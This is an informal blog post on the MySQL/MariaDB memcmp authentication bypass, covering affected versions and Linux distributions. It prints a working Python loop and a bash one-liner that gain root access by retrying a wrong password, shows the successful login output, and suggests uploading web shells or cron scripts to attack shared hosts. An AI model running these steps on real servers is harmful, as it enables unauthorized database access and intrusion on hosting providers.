MySQL/MariaDB Vulnerability Found, But Most Server Distros’s MySQL Are Seems To Be Not Affected

MySQL Logo

Well, it is funny that when you try to attempt to login into mysql(with CLI) root user with the wrong password for 300 to 512 times, it will just finally just you login as the root user, with the wrong password.

Vulnerable versions of MySQL and MariaDB are those compiled with libraries that return integers outside the -128 to 127 range for memcmp. According to Golubchik the gcc built in memcmp and BSD libc memcmp are safe, but the linux glibc sse-optimised memcmp is not safe.

Official builds from MySQL(Oracle), MariaDB are believe to be not vulnerable, but up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22, are potentially vulnerable.
5.1.63 and 5.5.24, which was just release recently have been verified that they do not have this hole.

Perhaps the proverb “When you fail, try again. Try harder until you success” is true after all in MySQL.
LOL

I’ve read from here, it shows you how to gain the root access of MySQL, using just a 1 line command python script.

#!/usr/bin/python
import subprocess

while 1:
subprocess.Popen(“mysql -u root mysql –password=blah”, shell=True).wait()

Below running the command:

[email protected]:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
(The same shits happens for around 300 over times between these)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

And if you prefer to just do it manually inside the shell, you may want to try this as well.

$ for i in `seq 1 512`; do echo ‘select @@version;’ | mysql -h 127.0.0.1 -u root mysql –password=X 2>/dev/null && break; done

How To Fuck The Hole?
So, in order to exploit this hole, the attacker must have access to the MySQL server. Or at least, any type of account on the server, such as shell account or a hosting account.
So if your MySQL port is open for remote access, there are very high possibility that you are fucked!

If you currently having a shared hosting account, you might be able to screw the host off with several ways below:
1. If the host did not disable shell_exec, then you can actually upload an AJAX shell script to play with it.
2. shell_exec disabled? But you can create a cron? Then upload a bash script and let the cron execute the bash script to do the work for you.
And be expected that the host ban your ass after you play with this shit.

I Am Using MySQL Too! So, Am I Fucked!?
Well, it depends.
According to what I read from here, not all Linux distros are affected.
According to HD Moore, the only affected distros that are found to have the fucked versions of MySQL in their repo are as below:
1. Ubuntu 64bit (10.04, 10.10, 11.04, 11.10 and 12.04) Start from 1 LTS version, until the latest LTS version.
2. OpenSuSE 12.1 64-bit (So far only 1 version found to have hole.)
3. Fedora 16 64-bit (So far only 1 version found to have hole.)
4. Arch Linux

So, MySQL from which distro’s repo are proven to be safe at the moment?
They are as below:
1. Debian (Yeah! Luke, I am your father! )
2. RHEL (Well, still worth to pay for its subscription in this case.)
3. CentOS (The exact same thing as RHEL without need to pay a single cent, so I take back my words at the line above.)
4. Gentoo (Well, it is indeed very solid.)
5. All other distros.

So far only builds from 4 distros listed at above are found to be fucked without condom, so, I am very sure that I am not fucked, as I don’t use any of those 4 affected distros in any of my servers at the moment.

If you are not hosting other people in your server, please lock your MySQL port to be accessing from outside.
If you are leaving the port open, then please tell me which distro you are using for your server and tell me its IP, I go and pay you a visit.

CC BY-NC-ND 4.0 MySQL/MariaDB Vulnerability Found, But Most Server Distros’s MySQL Are Seems To Be Not Affected by Garfield is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.